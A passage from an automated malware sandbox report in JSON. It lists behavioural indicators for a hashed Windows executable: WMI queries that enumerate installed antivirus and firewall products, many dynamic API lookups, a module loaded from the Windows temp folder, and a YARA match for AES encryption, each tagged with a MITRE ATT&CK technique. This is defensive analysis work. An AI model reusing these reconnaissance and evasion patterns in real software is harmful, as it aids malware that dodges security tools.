6000269-_~, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 600026b-_~_, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 600026c-_~_, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00005644-00000C60-46108119]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A\" (Indicator: \"mozilla/5.0 (\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n Found string \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0\" (Indicator: \"mozilla/5.0 (\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e8f68@ADVAPI32.dll\"\n \"0e000f00703f8f68@ADVAPI32.dll\"\n \"0e000f00cc3f8f68@ADVAPI32.dll\"\n \"11001200b4478f68@ADVAPI32.dll\"\n \"1100120048488f68@ADVAPI32.dll\"\n \"120013008c488f68@ADVAPI32.dll\"\n \"12001300e4488f68@ADVAPI32.dll\"\n \"14001500386e8f68@ADVAPI32.dll\"\n \"14001500506e8f68@ADVAPI32.dll\"\n \"14001500686e8f68@ADVAPI32.dll\"\n \"17001800806e8f68@ADVAPI32.dll\"\n \"0d000e00986e8f68@ADVAPI32.dll\"\n \"11001200a86e8f68@ADVAPI32.dll\"\n \"11001200bc6e8f68@ADVAPI32.dll\"\n \"0f001000fc6f8f68@ADVAPI32.dll\"\n \"140015003c708f68@ADVAPI32.dll\"\n \"1400150054708f68@ADVAPI32.dll\"\n \"0c000d009c708f68@ADVAPI32.dll\"\n \"0c000d00ac708f68@ADVAPI32.dll\"\n \"0e000f00bc708f68@ADVAPI32.dll\"\n \"0e000f00cc708f68@ADVAPI32.dll\"\n \"0b000c00dc708f68@ADVAPI32.dll\"\n \"1800190014738f68@RPCRT4.dll\"\n \"1300140040738f68@RPCRT4.dll\"\n \"1400150054738f68@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"GDI32.DLL\" at base 75fe0000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 770b0000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 714f0000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"KERNEL32\" at base 75c10000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 68990000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"RPCRT4.DLL\" at base 75ac0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005644)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63EE0000\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64690000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\" was detected as \".NET\" and name: \"Library\"\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on file \"sample.bin\"\n YARA signature for AES encryption matched on file \"Client.exe.2079776608\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows 